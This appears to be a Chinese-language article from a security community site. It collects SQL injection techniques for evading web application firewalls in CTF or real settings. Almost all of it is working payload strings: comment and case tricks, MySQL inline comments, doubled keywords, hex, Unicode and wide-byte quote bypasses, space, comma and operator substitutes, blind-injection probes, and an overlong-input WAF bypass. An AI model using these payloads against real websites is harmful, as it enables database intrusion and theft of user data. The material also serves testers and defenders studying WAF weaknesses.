CTF或過WAF的sql注入繞過姿勢總結 - 網安 - 專業的網絡安全產業、社區、知識平臺

1.注釋符繞過

常用的注釋符有：

1）-- 注釋內容

2）# 注釋內容

3）/*注釋內容*/

eg：union select 1,2#

union select 1,2 --+

構造閉合 ’ union select 1,2’

2.大小寫繞過

常用于 waf的正則對大小寫不敏感的情況。

eg：uniOn selEct 1,2

3.內聯注釋繞過

內聯注釋就是把一些特有的僅在MYSQL上的語句放在 /*!...*/ 中，這樣這些語句如果在其它數據庫中是不會被執行，但在MYSQL中會執行。別和注釋/*... */搞混了。

eg：union /*!select*/ 1,2

4.雙寫關鍵字繞過

一些簡單的waf中，將關鍵字select等只使用replace()函數置換為空，這時候可以使用雙寫關鍵字繞過。

eg：union seselectlect 1,2

5.特殊編碼繞過

1）十六進制繞過

eg：UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

2）ascii編碼繞過

eg：Test =CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

3）Unicode編碼

常用的幾個符號的一些Unicode編碼：

單引號: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7

空格：%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0

左括號：%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8

右括號：%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9

6.空格過濾繞過

可代替空格的方式：

1）/**/

2）()

3）回車(url編碼中的%0a)

4）`(tap鍵上面的按鈕)

5）tap

6）兩個空格

eg：union/**/select/**/1,2

select(passwd)from(users) #注意括號中不能含有*

select`passwd`from`users`

7.過濾or and xor(異或) not 繞過

and = &&

or = ||

xor = |

not = !

8.過濾等號=繞過

1）不加通配符的like執行的效果和=一致，所以可以用來繞過。

eg：UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name like "users"

2）rlike:模糊匹配，只要字段的值中存在要查找的部分就會被選擇出來，用來取代=時，rlike的用法和上面的like一樣，沒有通配符效果和=一樣

eg：UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name rlike "users"

3）regexp:MySQL中使用 REGEXP 操作符來進行正則表達式匹配

eg：UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name regexp "users"

4）使用大小于號來繞過

eg：select * from users where id > 1 and id < 3

5）<> 等價于 !=，所以在前面再加一個!結果就是等號了

eg：select * from users where !(id <> 1)

9.過濾大小于號繞過

在sql盲注中，一般使用大小于號來判斷ascii碼值的大小來達到爆破的效果。

1）greatest(n1, n2, n3…):返回n中的最大值

eg：select * from users where id = 1 and greatest(ascii(substr(username,1,1)),1)=116

2）least(n1,n2,n3…):返回n中的最小值，與上同理。

3）strcmp(str1,str2):若所有的字符串均相同，則返回0，若根據當前分類次序，第一個參數小于第二個，則返回 -1，其它情況返回 1

eg：select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117)

4）in關鍵字

eg：select * from users where id = 1 and substr(username,1,1) in ('t')

5）between a and b:范圍在a-b之間，包括a、b。

eg：select * from users where id between 1 and 2

select * from users where id between 1 and 1

10過濾引號繞過

1）使用十六進制

eg：UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

2）寬字節，常用在web應用使用的字符集為GBK時，并且過濾了引號，就可以試試寬字節。%27表示 '(單引號)，單引號會被轉義成\'

eg：%E6' union select 1,2 #

%df%27 union select 1,2,3 #

11.過濾逗號繞過

1）如果waf過濾了逗號，并且只能盲注，在取子串的幾個函數中，有一個替代逗號的方法就是使用from pos for len，其中pos代表從pos個開始讀取len長度的子串

eg：常規寫法 select substr("string",1,3)

若過濾了逗號，可以使用from pos for len來取代 select substr("string" from 1 for 3)

sql盲注中 select ascii(substr(database() from 1 for 1)) > 110

2）也可使用join關鍵字來繞過

eg：select * from users union select * from (select 1)a join (select 2)b join(select 3)c

上式等價于 union select 1,2,3

3）使用like關鍵字，適用于substr()等提取子串的函數中的逗號

eg：select user() like "t%"

上式等價于 select ascii(substr(user(),1,1))=114

5）使用offset關鍵字，適用于limit中的逗號被過濾的情況，limit 2,1等價于limit 1 offset 2

eg：select * from users limit 1 offset 2

上式等價于 select * from users limit 2,1

12.過濾函數繞過

1）sleep() -->benchmark()

MySQL有一個內置的BENCHMARK()函數，可以測試某些特定操作的執行速度。參數可以是需要執行的次數和表達式。第一個參數是執行次數，第二個執行的表達式

eg：select 1,2 and benchmark(1000000000,1)

2）ascii()–>hex()、bin()，替代之后再使用對應的進制轉string即可

3）group_concat()–>concat_ws()，第一個參數為分隔符

eg：mysql> select concat_ws(",","str1","str2")

4）substr(),substring(),mid()可以相互取代, 取子串的函數還有left(),right()

5）user() --> @@user、datadir–>@@datadir

6）ord()–>ascii():這兩個函數在處理英文時效果一樣，但是處理中文等時不一致。

13.緩沖區溢出

緩沖區溢出用于對付WAF，有不少WAF是C語言寫的，而C語言自身沒有緩沖區保護機制，因此如果WAF在處理測試向量時超出了其緩沖區長度，就會引發bug從而實現繞過

eg：?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

示例0xA*1000指0xA后面”A”重復1000次，一般來說對應用軟件構成緩沖區溢出都需要較大的測試長度，這里1000只做參考，在某些情況下可能不需要這么長也能溢出